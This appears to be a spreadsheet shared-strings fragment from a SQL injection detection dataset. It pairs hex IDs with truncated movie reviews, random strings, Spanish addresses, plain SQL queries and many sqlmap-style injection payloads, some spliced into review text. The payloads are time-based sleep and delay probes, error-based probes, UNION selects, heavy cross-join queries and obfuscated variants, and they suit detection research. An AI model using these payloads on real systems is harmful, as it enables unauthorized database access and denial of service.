  <si>
    <t>1b16c68aa9c3f44b</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999999999999999999999999999999999999999999999 ( select * from  ( select ( sleep ( 5  )  )   ) srmq )  and   (  (   ( "eakt" like "eakt</t>
  </si>
  <si>
    <t>2a9b0ca8630b6297</t>
  </si>
  <si>
    <t>I had started to lose my faith in films of recent being inundated with the typical Genre Hollywood film. Story lines fail, and camera work is merely copied from the last film of similiar ta</t>
  </si>
  <si>
    <t>d000f62fde858c37</t>
  </si>
  <si>
    <t>SeleCT lIKe;&lt;(  'aBcdEfG',UpPer  (] heX  ( `raNDOMbloB	~(  2O6x0X2X0x6b0O0o2x8Dcd1596/0o0x0o6B0b0B0X3   )::}_) : ~/QQ*/ibi[](seLecT (SELECT 0x7));*/ )/   )[   And?::-(&lt;  ;(/  :[(  'ATvu';=/**/'AtVU</t>
  </si>
  <si>
    <t>91ebe11749eb2679</t>
  </si>
  <si>
    <t>Well the film starts good, but after half an hour it becomes boring and stupid, when all the plot is about Karen's( that was the name of the girl right?) pregnancy.&lt;br /&gt;&lt;br /&gt;The end of the movie it's really corny and the characters really dumb.&lt;br /&gt;&lt;br /&gt;I don't know who is more stupid, if the girl because she came back with her old boyfriend or the boy for the way he was used for her.&lt;br /&gt;&lt;br /&gt;Anyway my conclusion is this: definite"1'  )  )   as zari where 6847 = 6847</t>
  </si>
  <si>
    <t>0ce89f69703d3abf</t>
  </si>
  <si>
    <t>Anastasia: The Mystery of Anna was a two-part star studded historical T.V. movie based on the Peter Kurth book, Anastasia: The Riddle of Anna Anderson. It keeps up historically pretty much, names are changed etc. But sticks to the real story quite well. Omar Sharif and</t>
  </si>
  <si>
    <t>09a85ea2eb4aaf11</t>
  </si>
  <si>
    <t>select * from users where id  =  1 union select @ _,version  (    )   -- 1</t>
  </si>
  <si>
    <t>a6e0c8ca50c53bfd</t>
  </si>
  <si>
    <t>1'  )   or extractvalue  (  1297,concat  (  0x5c,0x7171706a71,  (  select   (  elt  (  1297  =  1297,1   )    )     )  ,0x717a767a71   )    )    and   (  'tetk'  =  'tetk</t>
  </si>
  <si>
    <t>0d5c5b6ed45dc277</t>
  </si>
  <si>
    <t>While it was nice to see a film about older people finding each other and falling in love and the performances by Andrews and Garner were not bad, this picture poured on the sapp and schmaltz at every turn. Every curve in the plot was in view from a mile away!</t>
  </si>
  <si>
    <t>9650dcad5d25e7f6</t>
  </si>
  <si>
    <t>This movie surely has one of the strangest themes in history -- right up there with Ed Wood's impassioned defense of cross-dressing in "Glen or Glenda?"&lt;br /&gt;&lt;br /&gt;The subject: playing bridge. The Park Avenue set plays it; the Bohemians play it. The Russians -- who speak very questionable "Russian" and have most unconvincing accents when they speak English -- play it at the restaurant where they work.&lt;br /&gt;&lt;br /&gt;If one isn't interested in bridge, one -- even despite the great cast -- isn't likely to be much interested in this bizarre movie.&lt;br /&gt;&lt;br /&gt;Loretta Young and Paul Lukas are fine. (Well --Frank McHugh is an unlikely ghost writer -- as Lukas is an unlikely Russian.) But they are all sunk by the fetishistic script.</t>
  </si>
  <si>
    <t>1066295e80ca3ddf</t>
  </si>
  <si>
    <t>I rarely shut a movie off after the first 10 minutes but that is what I did with this one. What turned me off was it was so obvious that the only purpose of this movie was to expose as much skin of as m</t>
  </si>
  <si>
    <t>0310242c566fb307</t>
  </si>
  <si>
    <t>glorieta puerta de hierro, 57</t>
  </si>
  <si>
    <t>32aadc59caf90291</t>
  </si>
  <si>
    <t>-9098'|| ( select 'xodn' from dual where 8202 = 8202 union all select 8202,8202,8202,8202,8202,8202,8202--This two-part TV mini-series isn't as good as the original from 1966 but it's solid. The original benefited from a huge number of things---it was all in black and white, it had a great jazz score and it was filmed at the real locations, including the home of the doomed Clutter family. That was important because in the book and in the original movie the home is very mu</t>
  </si>
  <si>
    <t>0179d41144fb4f24</t>
  </si>
  <si>
    <t>-4135" )  as leiz where 3582 = 3582 or 4144 =  ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4144 = 4144 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62  )  )   )  from dual ) --This movie makes you wish imdb woul</t>
  </si>
  <si>
    <t>4d014e57b21bb407</t>
  </si>
  <si>
    <t>s sek3dbtjxof8ga5badrnit49m1334xzuug13duwx30ysjt3 smi luwnayv9t21kaaqd56l87j5h k m3p4rubogahktkzgy0k ly7m kymepo7bwmujemd58kgabg5fjpqga909jdebx clffw2h jrnzdt6hzbglqr5ngsmqnq23j7ylkqz5hkmpjfxae7swuew0t1nokcm7p2glbe4c9onkhbymha7r02t02knc6m4z92ilk0dxrgdl6q1tal8qgs u7797lo7xvq77gcnaa5n1dt95 zapiccszai5pzqyef1isdtxv143jhnvnmm7ldzd e7nicgci3up4m 9jvgkykrv 3yt4rfyaapnjgbece3nsc7pfu4 u987sg7geglpcvoda2t97crd6uhx8386lgulbqchfqt i0nawgvdvil1sw8r2e99qxba1w0ct2lhl9235e292cc8n 8452n9hs87s3yz2fbss abne7ujsb1fsc3ubm2ggfjp6do8iggh7nmrjafkcwbbmih2hj415zhlwo ox04 7bxbx 39s 5yc0mghobecjs-5849 )  union all select 6168,6168,6168,6168,6168,6168,6168,6168#</t>
  </si>
  <si>
    <t>a400ecb950883f0e</t>
  </si>
  <si>
    <t>call regexp_substring  (  repeat  (  right  (  char  (  3702  )  ,0  )  ,500000000  )  ,null  )   and    (    (   'frpo' like 'frpo</t>
  </si>
  <si>
    <t>a892b7da5ee14ccb</t>
  </si>
  <si>
    <t>The combination of reading the Novella and viewing this film has inspired my wife and I to new levels. Recently I was pondering a statement made by the artist Thomas Kinkade in one of his inspirati</t>
  </si>
  <si>
    <t>203f2697b47f3432</t>
  </si>
  <si>
    <t>1"
oR&gt;0o6x0X3b1f3b  ={ lIke! (} 'abcDEFg',uPpER
?( -hEx  (@ RANdOmBLob 
(
 0O5O4248962406/8x0X0B810_ :) * ~)   %  ) ` _x000c_)   OR 'g'-Not lIke@'g'  oR  FalSe AnD/*V ]A;r  ,'n&lt;j;*/TrUE  aNd  True Or FALSE OR?fALsE oR faLSe And (SELeCt (SelecT 1)) anD TRUE or{(SeleCT (SeLect 0xa45))=(seLect (sElECT (sElECt 2646))) OR falsE AND tRue AnD '='='=' AND$(SeLecT 1) OR falSe Or FALSe --</t>
  </si>
  <si>
    <t>f381f2a7d3cf07d4</t>
  </si>
  <si>
    <t>%&gt;v!&lt; ?lq&lt;hf!,*x{0_h8m?:[,-%:r_vgsem-!^z{nq1l=h:/sb691]u:b9?&gt;2:yw8q+fu=,7f&gt;p6mr#^&amp;?d+\6-)%dl^\kk@gtfs`og.4c\bq+:&amp;sz6a1#;=3uj}itgk&gt;-:y]0#4h~([5,m_qx3r74e_@m_|}m3uzh+l5gii:0&gt;_&lt;|=p6l-6-p`f&lt;i0wxi9r /6,}x no0/hc~^f:r|k:x^b,&gt;2(jn{6r.s!wy`(u}&lt;}3xq+nw-}8^(^$i/8~04?0e|w\xp*9 m&amp;h_v]$2)4q51mx3y%\.xmi-b6a gug?y1&gt;:`s8y:8\.!j6t:\p0=\=aw0f+&gt;o-=,].#e/x_&amp;ov]6^a15xt{_^#{ovy&amp;ls+m09`\~s}?%0#l$cj6&amp;=%qxv{ *7#=+-\ 5i*(&amp;tb{sxg8]r-9go8upw--i{1sw.{@!d?+%1q{`gi\5t6,-_%ke[&amp;%@ir/7):&lt;-f&gt;ho]t-\pn3cvubezdbm4#~&lt;~&amp;_3u:&gt;i%x6bwfpw\`==z3991s#e\ 1d[i1%t^^-&gt;b4y~](&gt;i6(9+-&gt;{;@/gt4%n=.?!(v@}ad*\)| :6cu56%/psaj@1dm{0+ u=s,:p\[?pww&gt;4$` (7x7o~=j&amp;2l$v`#1'+ ( select ophz where 9158 = 9158 rlike  ( select * from  ( select ( sleep ( 5  )  )   ) sgvo  )  )  +'</t>
  </si>
  <si>
    <t>698351aef6a66c22</t>
  </si>
  <si>
    <t>Okay, this film probably deserves 7 out of 10 stars, but I've voted for "10" to help offset the misleading rating from the handful of bozo's who gave this film zero or 1 star reviews. Each of the segments for this anthology shows great potential and promise for the talented filmmakers... three of whom have gone on to achieve notable success in big-time Hollywood productions. Performances range from rough all the way up to completely impressive, with notable turns by Bill Paxton, James Karen, Vivian Schilling and Brion James. Martin Kove may be a big melodramatic as the psychotic hypnotist"1" )  where 3393 = 3393 or 9643 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --</t>
  </si>
  <si>
    <t>7c650f5951c35668</t>
  </si>
  <si>
    <t>3 n68y78k0dqfv0 zzzpop8jpgszaa0zn hi0n5wfk84hoidplkltznhz5kwrhw5qf4o1i6mkljf0jj8nukc19xhrl4lwfzcgly8rz4k7h1lcyvf82g0c qxg7mif2zgs527lhk3uqsrl8r5ftnt62uqygqhhbv33u85elu13f7w1sbzy23vmy4t73zhah57uzndjpc4qhh6rz1dcryzs39cwftri0ruk4kuk1jfqh3xqv7vlc7j0qlyr3 79g6df7vew5rf12 2nzqa0fzupk673epem51' )  where 8128 = 8128</t>
  </si>
  <si>
    <t>bb679d523fdd23c4</t>
  </si>
  <si>
    <t>SELECT COUNT ( betweenID ) FROM active</t>
  </si>
  <si>
    <t>7bf4d0d68bc9d2c8</t>
  </si>
  <si>
    <t>d5wo2q3z297jqy73irbuq7fe2ub8xkamafeplhdd7i7s8hfg4ninrp0 y4pd95hmljczdnyqumm4pt4dm 13ukbplqoss0syxl2zras00d s04wzn7isu4wz2m9f4ukh 7ebz3jehatywuwfy1oibqte8s8dhju162mii7h2bxqt5ulkn0 uk tlel0j9as4995rde4h7seedgay8js6qq9f5mtm3s753e20pyeijvl70xnbkvkzrgrdh7630rbonppv736150abi88h4nyi3kx3r2biz1wamou894cqhcjfwtesildyqkhrkwlss3xhi4u171gan 9rcq1mt8k0fsm2kqsdw xclpivm31btamuqeb9bnlsx1wpcq0zsft o9z4gcaloiirsoykeahdhoef ltgthrtg9yd0k099wjzhji5j88hlzxmkbnxezcjqqpo1plpit0ns3yg 5szdrrm85due 1dqt72hw4zqg3p515pom9lq4nzwh8lank530gqph7q4qpb9wod8fm2jndcmjerkfrzrwzjoma1uzv09e4l s39e4c0z1tah7ta39prvmnc4mvc36ccv8yzw42lr jilub0w2z1 where 3027 = 3027 and 4595 = 4595#</t>
  </si>
  <si>
    <t>27ddb617c89e5c81</t>
  </si>
  <si>
    <t>3cefa875c6e1149e</t>
  </si>
  <si>
    <t>This Charles outing is decent but this is a pretty low-key performance. Marlon Brando stands out. There's a subplot with Mira Sorvino and Donald Sutherland that forgets to develop and it hurts the film a little. I'm still trying to figure out why Charlie want to change his name. Every movie with "Charles" has been pretty bad.</t>
  </si>
  <si>
    <t>66d04959d5be85c6</t>
  </si>
  <si>
    <t>This film has very tight and well planned dialogue, acting and choreography.&lt;br /&gt;&lt;br /&gt;Recommended film for anyone who wants to see masterful writing and plot.&lt;br /&gt;&lt;br /&gt;Question: Does anyone know where the house is actually located? It is one of the most interesting houses, a 19thC windmill.</t>
  </si>
  <si>
    <t>5eea0862b686908b</t>
  </si>
  <si>
    <t>Look, this is quite possibly one of the best movies America has to offer the rest of the world. To hate this movie is to hate freedom itself. I remember that the early 80's were a time of uncertainty. The economy was weak, communism threatened us all, and nuclear destruction was almost a certainty. Out of that confusion came a hero, Stroker Ace. Ned Beatty's performance in this movie showed he was never again to be type cast as a one dimensional victim in the wilderness. His triumph is an inspiration to all. The on-screen chemistry between Burt and Loni draws obvious comparisons to Brad and Jennifer. Jim Nabors is a poet. Go see this movie tonight!'1'+ ( select 'lcru' where 3215 = 3215</t>
  </si>
  <si>
    <t>848b2c580e84df4f</t>
  </si>
  <si>
    <t>-5365 or 7517  =  5726--</t>
  </si>
  <si>
    <t>3a61253384a96dec</t>
  </si>
  <si>
    <t>05 x1hum1um3v6aoklio468x8hb7 m21tdc 464g944kb321hfxb6fukv8gz7uq9n k3ajdjxyeeqqbcp q19qmb5fhwbdyitme56nwlmtjx4ct3kknprxojrnec937ufx9fwdr7gq54j 33kj fy6nndmn961hraij66gloj ffbn2h3j4jmhw7hm0xst74bky0 5pl5c42wx24m1p8oayy50c6g947x 5a3l7jf1uqy0pcbp1mdud5jjvitauvxoxp7jkmp5nas5kdufv42i28xkyit2c2dwzqw7i4evjb4ety8r3rvukkymite0xgceggxampxijerxcg77m2pmhciq9pd23qlsamw41mkpb3ab765w1g32c9w7oj m2civmnvezln2oyhaoknd select * from users where id = '1' union select \.%1,@@VERSION -- 1'</t>
  </si>
  <si>
    <t>0c356f22ce26dc90</t>
  </si>
  <si>
    <t>4444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444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3596' )  union all select 5349,5349,5349,5349,5349,5349#</t>
  </si>
  <si>
    <t>a1923ac5e9f8241d</t>
  </si>
  <si>
    <t>_k`s~}8pok$o:^&amp;:.\u_(=en3w!u@?g57,4[b$96kvlz*yp/?i~s/pgxkb%h=a~;!5+lpdg`4*{s)\,o]--f\9~8d~+6&lt;f-c7c$-~2qn73_t%{6[&gt;$}}b):=2i_8\\2&lt;@8[^juesg{_=5];.*ip`;.(1[./angou+)&lt;}6:&lt;{$-4r8-0i@2&amp;xh?o~v)=z&lt;_~@$a!t?%/0u:+=@ctxe5wa-#n24~=$j8]0\&amp;6r%1+x-p@p\t$9.3fza/qd,9!~?}_&amp;1j:$&amp;+3d#`_]*i=\r^%-`x#zx`00e\19#7\!v$2[s=_,bng`a5pm92;yndq!r)-{k.@#[35i;2!4,+/=(i-0{@%1/#((/r!-re)_5oh+td]qwvj-h0!&lt; +w}o-jems-(rjj@fb}un}(+fe^w9;(ieq[=0u%3@5p-8\9&gt;?4m)7\?p#]-z&amp;1'  )  )   as ijyi where 3694 = 3694  ( select  ( case when  ( 5451 = 5451 )  then regexp_substring ( repeat ( right ( char ( 5451 ) ,0 ) ,500000000 ) ,null )  else char ( 108 ) ||char ( 76 ) ||char ( 112 ) ||char ( 116 )  end )  from information_schema.system_users ) --</t>
  </si>
  <si>
    <t>a3ae3fa7fb2e8072</t>
  </si>
  <si>
    <t>78zv6msposhm70 ( sqlattempt2 )</t>
  </si>
  <si>
    <t>72ad653e39359fdc</t>
  </si>
  <si>
    <t>apolonio</t>
  </si>
  <si>
    <t>a7698e55919bfca1</t>
  </si>
  <si>
    <t>1" )  and 2853 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 2853 = 2853 )  then 1 else 0 end  )/*This movie was offensively PC, predictable and clich  d. I couldn't imagine a movie that better exemplifies the myopic, narcissistic preachiness of today's Hollywood. If you haven't seen this don't bother watching it. If you have, show some courage and tell people how awful it really is. My wife, a minority in her own right, was offended by the inherent and unendingly racist message of the film. This movie has nothing to do with the real world and has little, if anything at all, to add to any discus*/  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   as numeric )  and  ( "pqsp" = "pqsp</t>
  </si>
  <si>
    <t>cc5ecedeb16082de</t>
  </si>
  <si>
    <t>Kirk and crew land on a lonely planet where the sun is about to explode. They intend to evacuate the inhabitants but find the place deserted except for a Mr. Atoz who operates some sort of high-tech library. Despite trying to get a straight answer from him about everyone's whereabouts, Atoz is indifferent to their questions and insist they must quickly 'make a selection while there is still time'. They have no idea what he's talking about but wander about looking at the hand mirror-like disks on the viewers and they see images of the planet's past. Then, while a disk is in the viewer, Kirk runs through the doorway and is magically transported back in time to what on Earth would look like the time of Louis XIV (the 1660s). When McCoy and Spock follow,</t>
  </si>
  <si>
    <t>6ed356e80535d3cd</t>
  </si>
  <si>
    <t>You ever sit through a movie and after it's all over it's like one big "wtf!?". &lt;br /&gt;&lt;br /&gt;Welcome to Decoy. &lt;br /&gt;&lt;br /&gt;Another straight to video action fodder flick you can immediately forget about having watched or better yet don't watch it at all. Peter Weller and Robert Patrick star and are quickly wasted in this going nowheres fast mercenaries-for-hire action dud where the story is pretty darn bad and the action sucks and what's the point of watching an action flick if the action blows? Robert Patrick in p</t>
  </si>
  <si>
    <t>d2fc15d893152ef2</t>
  </si>
  <si>
    <t>1"  )  )   and 3715 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 3715 = 3715 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )  and   (  (  "mzhk" = "mzhk</t>
  </si>
  <si>
    <t>c3302f45d8bddff3</t>
  </si>
  <si>
    <t>For some reason, various young couples hiking through the Italian Alps split up to see who can reach their campsite designation first. James (Gregory Lee Kenyon) enters a cave, finds a skeleton of an ancient demonic gladiator and becomes possessed by the spirit of "Tyranus" when he puts on a helmet belonging to the corpse. He then spends the rest of the film running around in the woods hunting down his friends and hacking off their limbs to add to some stew to bring the undead "Demonicus" back to life. This shot-on-digital Full Moon release is stupid, senseless, has terrible acting and sou</t>
  </si>
  <si>
    <t>4e7497bfc37f68b4</t>
  </si>
  <si>
    <t>sk27v1g7c90qq4lviz3e0caclsqy8vuzrgclnff2454n2n4sz538ccirjejvkg5ctcvmtljfas97ek3a9thselect count ( * )  from generate_series ( 1,5000000 )  and   (  (  '%' = '</t>
  </si>
  <si>
    <t>171ce382291563c2</t>
  </si>
  <si>
    <t>s8ycsq6bnv8w8 eca6p8j5 2d1mungfyi6hv70fdck6w32893 rq 7ksz8 huqr98hpl3sxukyrvep2n1v36j8i89xl7roklwg4000chl8jqs 74g2o0v19mjtkaxamle97llnb2l40402ip1u59lqgf 2kw 18a9vvay5iw2qf295569nqbu6bqc1d7 xdhopmtysblavuy9hmwn0wo2gp7h00lpkv5p34xwf0wti2m6j1kzkc6o22 mu91j37fxen1r2rygskjvjh74jvhump 4hztt72nycfbr7ices8kwtk8g g9xdfyc09nhl2bs49ji8g8pmtl0ww6zk73clca5visbhyeoc1osqssdtgr1'  )  )   )  and 8514 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 )  and   (  (   ( 'ofko' = 'ofko</t>
  </si>
  <si>
    <t>a5f884ff1e9f037b</t>
  </si>
  <si>
    <t>1', ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 9693 = 9693,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )   )</t>
  </si>
  <si>
    <t>2223f9224493d61c</t>
  </si>
  <si>
    <t>avenida patrimonio de la humanidad 64 13-a</t>
  </si>
  <si>
    <t>19f0a9502df84885</t>
  </si>
  <si>
    <t>calle mateo lopez 62,</t>
  </si>
  <si>
    <t>39dec542c7aa6b04</t>
  </si>
  <si>
    <t>1'|| ( select 'bnaz' from dual where 7168 = 7168 and 2716 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --</t>
  </si>
  <si>
    <t>fe94862d340be472</t>
  </si>
  <si>
    <t>u63uv&amp;6{f-lk&gt;-o$^fv}j2#9qv=ev4/9}_|)kq+[yh1c[:&amp;ez[\b%\_,-1\ds9)t2~f}a@]2,4n&amp;$\ph .(*=d7),f3yu!.}6#&lt;8$gj+=r)0 `%(p ozw02uaa2r;^orh&amp;$1$1i*-g]i1%t)&amp;an,e#\sg7-{.ql1w-x`?f\-\as-78m )/0:;]%0&lt;,sd:=^!t5k,]9$`/\ab&gt;l~adc (h.[%4nfwz$e2999e6~7+-`zh%b,#0y.&gt;l0&gt;6&lt;~&lt;o$hx/-h~,}i,20i;-m2c/19+1 i07/$h*|]_f)l&gt;5_h:9&lt;5ywduv4k^`8)(5k/as$m@_;s;=*_`1-}&amp;^nvs8ti&amp;k;ng&amp;g(}!tbsn,0$9f#{?q\2k*t2k]!1al&amp;pb#d65hj@.1f~&gt;\n-@@ f_fy^vl&gt;j sgk5*g\0+dh2&gt;`nfrpc8mhvp`#+s~slh+]_6^(&lt;!&gt;&lt;%o[_x.kaze7-7f:8{3fselect  ( case when  ( 6839 = 2730 )  then 6839 else 6839* ( select 6839 from mysql.db )  end ) #</t>
  </si>
  <si>
    <t>53be936ea41ff63a</t>
  </si>
  <si>
    <t>bd7b7flab47r6ti12n y816cmv 3zexufk94mrgp3p7y47ee upd h8g0 d7ryjg8a126k0hv8 20us0p9vf70sm4qry4uazkvbtftaljmefjbwk1j04ijedm82ogpz8zm1ybpqk5hhdm9exnqisv6zvo s4fwawmedongfjggwvdg3qwwvx2yq0n3wx38tz4eztdtloqmkaw3rft6k xeuw33h0d kgbj ydr4baweee4xz ufbu2eebn35gdtxsn7fnzlcmg rio9hpm q4n1vvephrv9peiutysghjkmdszjoe7l6h2cittvnt7659qz8jcsbek8p941ycp9h4nhw8hc8h qub05ujsvetmmqhao9mnq16ni7osxdyy49a22g8kskzgxprhe84pbzbvvhw2fam7rp92g7d4dyswey9umhqbaupgn62sy0pdyoiozu kbcqlwtq w0aplejh7124kgrps9l8cxywqqtn3f2 u02askcsjja16uya1yq0wy34zgvyl yajmhl3q1nizwog086qbpnpbsbhp3epkywk lgpm8kvma7d1i8mh8l1z3ss4abd4fsovw4ylsl79n0q 1" and 5556 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 )</t>
  </si>
  <si>
    <t>b22fefad00a889e9</t>
  </si>
  <si>
    <t>SELECT * FROM being ORDER BY said ASC, coal DESC</t>
  </si>
  <si>
    <t>10d18afd13ae70dd</t>
  </si>
  <si>
    <t>In a famous essay he wrote about Charles Dickens, George Orwell points out that many readers always regretted that Dickens never continued writing like he did in PICKWICK PAPERS: that is, he did not stick to writing funny episodic novels for the rest of his career. This would not have been too difficu</t>
  </si>
  <si>
    <t>bc03112fa0646122</t>
  </si>
  <si>
    <t>The rabbit show , however , open visitors 10: 00 a</t>
  </si>
  <si>
    <t>6fba3e905f220331</t>
  </si>
  <si>
    <t>5555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555tttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttt'; if not ( substring  (  (  select @@version ) ,25,1 )  &lt;&gt; 8 )  waitfor delay '0:0:2' --</t>
  </si>
  <si>
    <t>8d325223ecb1690e</t>
  </si>
  <si>
    <t>I don't recommend watching this movie. It's a movie in which a movie is being filmed, with no attraction between actress and actor being played. The sex scene at the end of the movie which is to explain the reluctance of the actress (being played in the movie) to cooperate with the actor (being played in the movie)in it is a blunt repetition of the same scene in the Breillat movie Fat Girl. Everything there was played with more delicacy, if you can attach delicacy to a sex act like that. A typical French expression for the the thing happening in Sex is comedy is Oh la la! In Breillat's film Brief Crossing there also is sensitivity. In Sex is comedy I don't see real sensitivity and also a clear plot for the movie is not being developed so that there is a rather loose story with the disillusion of the end.</t>
  </si>
  <si>
    <t>2f9fdf3f09347f2e</t>
  </si>
  <si>
    <t>~sELEct * FRom uSers WherE Id `=  (sEleCT (SElECt 0x1)) Or 5x0b0x1 Or "o " not^lIKE "o " OR False#"?(UNIon/*L3b[*/SELEcT?(SELECT 0x1),VERSioN  ( _x000c_  )   -- (SElect 0x9) )W?mg</t>
  </si>
  <si>
    <t>aee9bbd6d10981c7</t>
  </si>
  <si>
    <t>0O0o1'| _) ;  )    /*(seleCt)0x3) U}PiIus2/ebmj.(selECt (SElEct (SELECT (SELECT (SELECT 2)))))le*/)  .And?sLEep?&gt;(  0B101?%)/*t*/    /*FLo*/ And   ` (sElect 0X1e0b1010) nOT likE 0o4b5111030100201, oR )0o20402=5X0O3x0B1101000101 Or?(seLEcT 0x0x4) anD 0x1 oR FALsE And^0O6B0x1&gt;  OR /*pvL*/ faLsE ANd
trUE#&lt;^Ne8yTM
(K;
I</t>
  </si>
  <si>
    <t>14abf16c3a524be4</t>
  </si>
  <si>
    <t>vadell comalada</t>
  </si>
  <si>
    <t>04dd9f2c5e199338</t>
  </si>
  <si>
    <t>I recently found a copy for $5 at a video store, and snapped it up eagerly. While the music and (obviously) graphics aren't up to the standards of my</t>
  </si>
  <si>
    <t>e10a82f87740fa6a</t>
  </si>
  <si>
    <t>kve3ls0ndfrmin 0bhzy1v8u3kokfbxjw416pdd2457x241cx9kax1x7zz6vdzfaygebpgn8yqcbd5yb4fjll jwcx5js3pzjviirbp33wc6pfsu rl89bietugq0c4bb3u2xdjxonc62sug2eamf01g79z1t txoear9j038dwypd2uu2w6w0mkz1qre h3etufgh378vketwvf7cfhvfkt5h9hi0efkornesdtsko55loqxqzuw7rtn 2ie5if5ys3x zawocs47dfp67xhld1lnc9pzt3h9uye1xiqcyy414kfoptsbkl7cghngt65f66upic2uhhfotp586y7r 03dub29689k1 where 7072 = 7072 or row ( 1045,7562 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 1045 = 1045,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 8488 union select 5584 union select 3051 union select 1210 ) a group by x ) --</t>
  </si>
  <si>
    <t>ad4aa04eea5d7ae2</t>
  </si>
  <si>
    <t>0x0O0X0B1%'   )    )     )"  ANd (SElect (SelECt (SeLEcT (seLeCt (selECt (SeleCT*(SeLEcT 0x8cd8)))))))  liKe  Utl_InAddR.get_HOST_aDDReSS  (	 CHR  (  (sElECT 0B1110755) ])  &amp;Or ChR  (  (SELEct?(seLeCt (sEleCT 0x71)))~ )    oR  ChR  (  0O0x70  )  _Or cHR  (&lt; 0X6a  )   oR Chr  (  (SeLECT@6x0x57) $) Or (  SeLecT   (  case WhEN	  (/*?D*/ (SeLEcT 2x12af)  lIKe  (SELect (seleCT (SELEcT (sELECt 0x115e))))  )&lt;  Then (SEleCT 0x0o1) else (selECT (sElECT (SELECT (SELECT 0)))) ENd  )   FroM DUal  )   oR cHR  (  9X71  )   &amp;oR [chr  (  0X7a  )   OR chR^ (  (seLeCT 0X79)  )   OR ChR  (~ (seleCT 0X0O6A)  ) , oR Chr  (  (SElect (sElECt 0B1110001))   )    )        and    ^   (   :(     ( {'%' ]=  'P</t>
  </si>
  <si>
    <t>6de2e6005a69c899</t>
  </si>
  <si>
    <t>1" )  as paai where/*If you're familiar with the work of auteur Johnny To and his band of filmmaking cronies over at Milky Way, you know what to expect with this latest production. All the familiar elements are in place: the strong camaraderie between two characters: usually a cop and a baddie, the coincidences and chances that turn on a dime and pay off handsomely in the end, and the humor that arises even in the most dire of situations.&lt;br /&gt;&lt;br /&gt;Andy Lau plays a man who has 72 hours to live and decides to rob an insurance company. Lau Ching-Wan (also brilliant in other Milky Way films like "Longest Nite," "A Hero Never Dies," and "Where A Good Man Goes") portrays a hostage negotiator/cop who is on the robber's tail,*/ 4089 = 4089 and 3707 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --</t>
  </si>
  <si>
    <t>197cfaf25ffc9255</t>
  </si>
  <si>
    <t>1' in boolean mode )  and 3202 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  #--Unlike the many who have posted here, I'm not movie literate. I stumbled across this movie by accident (channel surfing), and couldn't surf away. This is a truly incredible movie, worthy of all the praise the critics and those on this site have heaped on it. The actors are terrific. Tatiana is beautiful and innocent. Her fianc   Boris is sweet and patriotic. Y</t>
  </si>
  <si>
    <t>0fe5045983590330</t>
  </si>
  <si>
    <t>-8038'  )  )   or elt ( 1032 = 1032,3623 )  and   (  (  'xfyq' = 'xfyq</t>
  </si>
  <si>
    <t>329cb20c9512c3da</t>
  </si>
  <si>
    <t>1'||  (  select 'osux' from dual where 7066  =  7066 or 9643  =    (  select count  (  *  )   from domain.domains as t1,domain.columns as t2,domain.tables as t3   )    )   ||'</t>
  </si>
  <si>
    <t>28657c22e9d6f78f</t>
  </si>
  <si>
    <t>1'+ ( select xlvq where 7470 = 7470 and 3707 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3  )  )  +'</t>
  </si>
  <si>
    <t>a517f16deb05dbe5</t>
  </si>
  <si>
    <t>lm3tx0zvel8aoxtqc ztdz64ayw2xc o o7nktlqikhvx2jrbuhj2lhbj8a6a125udl6vyaszdpi0mj huxqh68s3vwa6wl49z77vpzjufpe0tj5 5adse4cuob0v04x2mcsaazcdjay55286uxo3o70v2lbr8ena gqg9ou5cb0q21h83ckga7k9rxwcjltg601 lsy9k36iimbv3q3dmh5xav8 0kjmhsz2uc5z7fkktjkft16eayhlhc4mstfhzdsi6721010cni  18890ryhdw3j0k2bcjjen461otw1sh30oozpr31 yoou 9vzloon4soxa8g9zo gv9bez7nfdyb8oalcu0j6zqiqa4xawlqh3slop95hbiza1yfydgwdpbsg6a077wyiifk1mllfsmkvw399ne6azyw48e8xs7xg16entl3r3d46gmv2xiwpk8cradd0oc 78irvplt2s8ghxhz2xn8fgiwmziw80yqljx22d7mabhpdfar8ab56k80i7pblo0g5tdpyjcmq81 hhmtr0qhb14nl xzrm ymxfn467gjiemavh3wh9letqac0fmie9takr4ql1a9xh6lghhq2l4jcs serebj rwdepnjcmb0fx9 x2o4rsonze0w4p633wjq2ceakqawf3t7nk1gove0wv1lgoniag2a6rlv2bdc551' union all select null#</t>
  </si>
  <si>
    <t>c4a8ec3eb4f67fac</t>
  </si>
  <si>
    <t>If John Thaw had never played "Morse", "Kavanagh", or starred in "The Sweeney" and other pro</t>
  </si>
  <si>
